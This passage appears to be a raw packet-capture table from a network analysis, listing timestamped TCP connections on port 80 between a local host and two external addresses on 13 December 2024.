                                                                                                                                                                                                Dec 13, 2024 08:19:55.098268986 CET8049904185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:55.098328114 CET4990480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:55.099457979 CET4990480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:55.215802908 CET4990580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:55.219120979 CET8049904185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:55.335475922 CET8049905185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:55.335582018 CET4990580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:55.335654974 CET4990580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:55.455286026 CET8049905185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:55.455348015 CET4990580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:55.575043917 CET8049905185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:56.791726112 CET8049905185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:56.791866064 CET8049905185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:56.791918039 CET4990580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:56.794111967 CET4990580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:56.903171062 CET4991180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:56.913798094 CET8049905185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:57.022910118 CET8049911185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:57.023031950 CET4991180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:57.023049116 CET4991180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:57.142868042 CET8049911185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:57.142934084 CET4991180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:57.263647079 CET8049911185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:58.460819960 CET8049911185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:58.461002111 CET8049911185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:58.461050987 CET4991180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:58.462372065 CET4991180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:58.582093000 CET8049911185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:58.611733913 CET4991780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:58.731515884 CET8049917185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:58.731632948 CET4991780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:58.733786106 CET4991780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:58.853533983 CET8049917185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:19:58.856148958 CET4991780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:19:58.975990057 CET8049917185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:00.374104977 CET8049917185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:00.374298096 CET8049917185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:00.374420881 CET4991780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:00.376017094 CET4991780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:00.482191086 CET4992380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:00.495681047 CET8049917185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:00.601942062 CET8049923185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:00.603764057 CET4992380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:00.603835106 CET4992380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:00.723536015 CET8049923185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:00.724796057 CET4992380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:00.844552994 CET8049923185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:02.051659107 CET8049923185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:02.051804066 CET8049923185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:02.051866055 CET4992380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:02.061976910 CET4992380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:02.168539047 CET4992580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:02.181668997 CET8049923185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:02.288233995 CET8049925185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:02.288301945 CET4992580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:02.288397074 CET4992580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:02.408023119 CET8049925185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:02.408114910 CET4992580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:02.527956963 CET8049925185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:03.729346037 CET8049925185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:03.729598045 CET8049925185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:03.729652882 CET4992580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:03.730840921 CET4992580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:03.840456963 CET4993080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:03.850671053 CET8049925185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:03.960284948 CET8049930185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:03.960536003 CET4993080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:03.960536003 CET4993080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:04.080357075 CET8049930185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:04.080507994 CET4993080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:04.200484037 CET8049930185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.421852112 CET8049930185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.421916962 CET8049930185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.421955109 CET4993080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.424268007 CET4993080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.528285027 CET4993680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.543915987 CET8049930185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.648156881 CET8049936185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.648233891 CET4993680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.648298025 CET4993680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.768008947 CET8049936185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.768138885 CET4993680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.827820063 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.827897072 CET4993780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:05.828006029 CET4993980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.887876987 CET8049936185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.948465109 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.948482990 CET8049937185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.948601007 CET8049939185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:05.948600054 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.948636055 CET4993780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:05.948714972 CET4993980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.962958097 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:05.963071108 CET4993780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:05.963198900 CET4993980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:06.082775116 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:06.082803965 CET8049937185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:06.082854033 CET8049939185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.258137941 CET8049936185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.258152008 CET8049936185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.258337975 CET4993680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.259476900 CET4993680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.276977062 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.276989937 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277003050 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277034044 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277070045 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277079105 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277091026 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277121067 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277142048 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277170897 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277209997 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277211905 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277226925 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277237892 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277251005 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277261019 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277261019 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277291059 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.277309895 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.282926083 CET8049937185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.283086061 CET4993780192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:20:07.300534010 CET8049939185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.300584078 CET4993980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.372013092 CET4994380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.379349947 CET8049936185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.397280931 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.397298098 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.397430897 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.401341915 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.401421070 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.469158888 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.469293118 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.469432116 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.473726988 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.473742962 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.473818064 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.481858015 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.481939077 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.481961012 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.482000113 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.490381002 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.490432024 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.490500927 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.491782904 CET8049943185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.493771076 CET4994380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.493771076 CET4994380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.498821974 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.498953104 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.499044895 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.507386923 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.507401943 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.507565975 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.515641928 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.515656948 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.515779972 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.524059057 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.524116993 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.524243116 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.532442093 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.532515049 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.532649040 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.540234089 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.540251970 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.540371895 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.547864914 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.547904968 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.548027039 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.589471102 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.589489937 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.589636087 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.613614082 CET8049943185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.614911079 CET4994380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.661186934 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.661325932 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.661484003 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.663660049 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.663717031 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.663742065 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.663788080 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.668472052 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.668518066 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.670234919 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.670284986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.670325994 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.670371056 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.675167084 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.675261021 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.675331116 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.675419092 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.679959059 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.680016994 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.680061102 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.680109978 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.684701920 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.684801102 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.684844971 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.684982061 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.689378023 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.689448118 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.689493895 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.689733028 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.694035053 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.694088936 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.694164991 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.694210052 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.698654890 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.698791027 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.698856115 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.703291893 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.703423977 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.703502893 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.708003998 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.708154917 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.708246946 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.712658882 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.712754965 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.712785959 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.712821960 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.717284918 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.717413902 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.717477083 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.721965075 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.722098112 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.722176075 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.725826979 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.725944042 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.726011992 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.729783058 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.729800940 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.729871988 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.733463049 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.733582973 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.733661890 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.734657049 CET8049943185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.737266064 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.738379002 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.853650093 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.853790998 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.853910923 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.855041981 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.855070114 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.855113983 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.855149031 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.858057022 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.858175993 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.858237982 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.861047983 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.861068010 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.861119986 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.863821983 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.863935947 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.863996029 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.866833925 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.866929054 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.866985083 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.869596958 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.869674921 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.869710922 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.869760036 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.872550964 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.872730017 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.872790098 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.875384092 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.875498056 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.875564098 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.878273010 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.878353119 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.878356934 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.878431082 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.881175995 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.881268024 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.881349087 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.884037971 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.884154081 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.884161949 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.884226084 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.886933088 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.886957884 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.887025118 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.889802933 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.889986038 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.890065908 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.892697096 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.892788887 CET4993880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:20:07.892795086 CET8049938185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:20:07.895279884 CET4993880192.168.2.11185.81.68.147
